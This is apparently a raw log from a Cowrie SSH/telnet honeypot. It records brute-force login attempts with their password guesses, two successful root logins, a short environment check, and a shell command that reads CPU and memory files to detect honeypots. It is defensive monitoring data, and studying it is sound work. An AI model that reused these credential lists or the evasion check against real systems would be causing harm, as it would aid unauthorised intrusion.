{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":51631,"dst_ip":"1.2.3.4","dst_port":22,"session":"3436c002cc81","protocol":"ssh","message":"New connection: 80.94.95.112:51631 (1.2.3.4:22) [session: 3436c002cc81]","sensor":"my-vps","timestamp":"2025-08-28T08:18:49.965198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:18:49.966040Z","src_ip":"80.94.95.112","session":"3436c002cc81"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:18:49.996350Z","src_ip":"80.94.95.112","session":"3436c002cc81"}
{"eventid":"cowrie.login.failed","username":"admin","password":"badbad","message":"login attempt [admin/badbad] failed","sensor":"my-vps","timestamp":"2025-08-28T08:18:50.198825Z","src_ip":"80.94.95.112","session":"3436c002cc81"}
{"eventid":"cowrie.login.failed","username":"admin","password":"arrakis","message":"login attempt [admin/arrakis] failed","sensor":"my-vps","timestamp":"2025-08-28T08:18:51.231575Z","src_ip":"80.94.95.112","session":"3436c002cc81"}
{"eventid":"cowrie.login.failed","username":"admin","password":"armstrong","message":"login attempt [admin/armstrong] failed","sensor":"my-vps","timestamp":"2025-08-28T08:18:52.265041Z","src_ip":"80.94.95.112","session":"3436c002cc81"}
{"eventid":"cowrie.login.failed","username":"admin","password":"arman","message":"login attempt [admin/arman] failed","sensor":"my-vps","timestamp":"2025-08-28T08:18:53.297692Z","src_ip":"80.94.95.112","session":"3436c002cc81"}
{"eventid":"cowrie.login.failed","username":"admin","password":"arielle","message":"login attempt [admin/arielle] failed","sensor":"my-vps","timestamp":"2025-08-28T08:18:54.330466Z","src_ip":"80.94.95.112","session":"3436c002cc81"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:18:55.363377Z","src_ip":"80.94.95.112","session":"3436c002cc81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":31529,"dst_ip":"1.2.3.4","dst_port":22,"session":"31176481da98","protocol":"ssh","message":"New connection: 212.227.125.160:31529 (1.2.3.4:22) [session: 31176481da98]","sensor":"my-vps","timestamp":"2025-08-28T08:18:55.979151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:18:55.980468Z","src_ip":"212.227.125.160","session":"31176481da98"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:18:56.061502Z","src_ip":"212.227.125.160","session":"31176481da98"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-28T08:18:56.481845Z","src_ip":"212.227.125.160","session":"31176481da98"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abc123","message":"login attempt [oscar/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:18:57.564634Z","src_ip":"212.227.125.160","session":"31176481da98"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abcd123","message":"login attempt [oscar/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:18:58.647785Z","src_ip":"212.227.125.160","session":"31176481da98"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abcd1234","message":"login attempt [oscar/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T08:18:59.732142Z","src_ip":"212.227.125.160","session":"31176481da98"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abc1234","message":"login attempt [oscar/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T08:19:00.815031Z","src_ip":"212.227.125.160","session":"31176481da98"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:19:01.899434Z","src_ip":"212.227.125.160","session":"31176481da98"}
{"eventid":"cowrie.session.connect","src_ip":"173.212.245.48","src_port":45286,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a5818a4e5c6","protocol":"ssh","message":"New connection: 173.212.245.48:45286 (1.2.3.4:22) [session: 7a5818a4e5c6]","sensor":"my-vps","timestamp":"2025-08-28T08:19:55.862998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:19:55.896197Z","src_ip":"173.212.245.48","session":"7a5818a4e5c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:19:56.172974Z","src_ip":"173.212.245.48","session":"7a5818a4e5c6"}
{"eventid":"cowrie.login.success","username":"root","password":"10611qwertyuiop","message":"login attempt [root/10611qwertyuiop] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:19:56.301646Z","src_ip":"173.212.245.48","session":"7a5818a4e5c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:19:56.430204Z","src_ip":"173.212.245.48","session":"7a5818a4e5c6"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T08:19:56.430957Z","src_ip":"173.212.245.48","session":"7a5818a4e5c6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:19:56.489917Z","src_ip":"173.212.245.48","session":"7a5818a4e5c6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:19:56.490988Z","src_ip":"173.212.245.48","session":"7a5818a4e5c6"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":46984,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd3974b48801","protocol":"ssh","message":"New connection: 80.94.95.15:46984 (1.2.3.4:22) [session: bd3974b48801]","sensor":"my-vps","timestamp":"2025-08-28T08:20:30.895890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:20:30.896959Z","src_ip":"80.94.95.15","session":"bd3974b48801"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:20:30.996665Z","src_ip":"80.94.95.15","session":"bd3974b48801"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate","message":"login attempt [tate/tate] failed","sensor":"my-vps","timestamp":"2025-08-28T08:20:31.933657Z","src_ip":"80.94.95.15","session":"bd3974b48801"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate1","message":"login attempt [tate/tate1] failed","sensor":"my-vps","timestamp":"2025-08-28T08:20:33.028036Z","src_ip":"80.94.95.15","session":"bd3974b48801"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate123","message":"login attempt [tate/tate123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:20:34.131986Z","src_ip":"80.94.95.15","session":"bd3974b48801"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate1234","message":"login attempt [tate/tate1234] failed","sensor":"my-vps","timestamp":"2025-08-28T08:20:35.227457Z","src_ip":"80.94.95.15","session":"bd3974b48801"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate12345","message":"login attempt [tate/tate12345] failed","sensor":"my-vps","timestamp":"2025-08-28T08:20:36.322955Z","src_ip":"80.94.95.15","session":"bd3974b48801"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:20:37.719785Z","src_ip":"80.94.95.15","session":"bd3974b48801"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":40676,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce8294271710","protocol":"ssh","message":"New connection: 185.93.89.7:40676 (1.2.3.4:22) [session: ce8294271710]","sensor":"my-vps","timestamp":"2025-08-28T08:22:31.421265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:22:31.436041Z","src_ip":"185.93.89.7","session":"ce8294271710"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:22:31.459799Z","src_ip":"185.93.89.7","session":"ce8294271710"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:22:41.444954Z","src_ip":"185.93.89.7","session":"ce8294271710"}
{"eventid":"cowrie.session.connect","src_ip":"130.185.122.7","src_port":42636,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd1ab18db015","protocol":"ssh","message":"New connection: 130.185.122.7:42636 (1.2.3.4:22) [session: bd1ab18db015]","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.620965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.621776Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.648421Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.login.success","username":"root","password":"12345@admin","message":"login attempt [root/12345@admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.730530Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:22:58.803691Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.804376Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.805073Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.806871Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.807660Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.809126Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.810005Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.810789Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.811743Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.812922Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.813987Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.842047Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.842966Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:22:58.844137Z","src_ip":"130.185.122.7","session":"bd1ab18db015"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.39","src_port":23332,"dst_ip":"1.2.3.4","dst_port":23,"session":"45a3c6fc372a","protocol":"telnet","message":"New connection: 172.236.228.39:23332 (1.2.3.4:23) [session: 45a3c6fc372a]","sensor":"my-vps","timestamp":"2025-08-28T08:22:59.395095Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T08:22:59.396457Z","src_ip":"172.236.228.39","session":"45a3c6fc372a"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-28T08:22:59.397482Z","src_ip":"172.236.228.39","session":"45a3c6fc372a"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-28T08:22:59.398936Z","src_ip":"172.236.228.39","session":"45a3c6fc372a"}
{"eventid":"cowrie.session.closed","duration":0.17584800720214844,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:22:59.570872Z","src_ip":"172.236.228.39","session":"45a3c6fc372a"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.39","src_port":23346,"dst_ip":"1.2.3.4","dst_port":23,"session":"fb766930328f","protocol":"telnet","message":"New connection: 172.236.228.39:23346 (1.2.3.4:23) [session: fb766930328f]","sensor":"my-vps","timestamp":"2025-08-28T08:22:59.737343Z"}
{"eventid":"cowrie.session.closed","duration":0.0012929439544677734,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:22:59.738561Z","src_ip":"172.236.228.39","session":"fb766930328f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59712,"dst_ip":"1.2.3.4","dst_port":22,"session":"86f754a7cfd9","protocol":"ssh","message":"New connection: 217.72.205.35:59712 (1.2.3.4:22) [session: 86f754a7cfd9]","sensor":"my-vps","timestamp":"2025-08-28T08:23:27.523149Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:23:27.524361Z","src_ip":"217.72.205.35","session":"86f754a7cfd9"}
{"eventid":"cowrie.session.connect","src_ip":"154.94.19.197","src_port":34934,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7ac6d50cbf5","protocol":"ssh","message":"New connection: 154.94.19.197:34934 (1.2.3.4:22) [session: f7ac6d50cbf5]","sensor":"my-vps","timestamp":"2025-08-28T08:24:09.521025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:24:09.521930Z","src_ip":"154.94.19.197","session":"f7ac6d50cbf5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63114,"dst_ip":"1.2.3.4","dst_port":22,"session":"7932f298e8a5","protocol":"ssh","message":"New connection: 212.227.235.229:63114 (1.2.3.4:22) [session: 7932f298e8a5]","sensor":"my-vps","timestamp":"2025-08-28T08:24:54.761533Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:24:54.762951Z","src_ip":"212.227.235.229","session":"7932f298e8a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63426,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ae0ca5d940b","protocol":"ssh","message":"New connection: 212.227.235.229:63426 (1.2.3.4:22) [session: 1ae0ca5d940b]","sensor":"my-vps","timestamp":"2025-08-28T08:24:54.888205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:24:54.889031Z","src_ip":"212.227.235.229","session":"1ae0ca5d940b"}
